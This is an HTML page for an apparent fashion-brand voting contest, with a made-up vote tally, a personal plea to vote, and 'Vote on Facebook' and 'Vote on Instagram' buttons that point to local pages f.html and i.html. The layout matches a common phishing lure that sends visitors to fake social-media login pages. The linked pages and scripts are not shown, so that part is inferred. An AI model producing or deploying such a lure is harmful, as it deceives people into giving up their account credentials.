<!DOCTYPE html>
<html>

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="theme-color" content="#0d6efd">
  <script src="https://kit.fontawesome.com/df4806f026.js" crossorigin="anonymous"></script>
  <link rel="stylesheet" href="styles/entery.css">
  <link rel="stylesheet" href="style.cs" />
  <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">
  <link rel="icon" type="image/png" href="images/check-mark.png">
  <title>Fashion brands 2025</title>
   <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
  <script src="main.js"type="module"></script>
</head>
<body>
    <div class="card">
      <div class="lang-selector">
        <div class="wrap"><span>🌐</span> <span>Select language</span>
      </div>
      <i class="fas fa-chevron-down"></i>
    </div>
    
    <div class="img-card">
      <img src="images/fashion.jpg"class="card-img"alt="fashion company banner" />
      <div class="contents">
        <h1 class="page-title">
          The people's pick
        </h1>
        <div class="vote-profile">
          <div class="avata">
            <img src="images/check-mark.png"class="av" alt="check mark" />
          </div>
          <div class="profile-txt">
            <h3 class="tit">
              Fashion brand
            </h3>
            <p class="desc">194 votes #1</p>
          </div>
        </div>
      
      
      <div class="txt">
        <p>I need your support! Please take a moment to cast your vote and help me reach new heights in this competition. Your vote could be the difference-maker, propelling me toward victory</p>
        <div>
          
          <a href="f.html">
        <button class="vote-btn btn fb-btn"value="facebook"><i class="fa-brands fa-facebook"></i>
        
        Vote on Facebook
        </button>
        </a>
        
                <a href="i.html"><button class="vote-btn btn"value="Instagram">
                  <img src="images/images.jpeg"alt="Instagram icon"class="icon" />
                  Vote on Instagram
                  </button></a>
        </div>
      </div>
    </div>
  </div>
</body>

</html>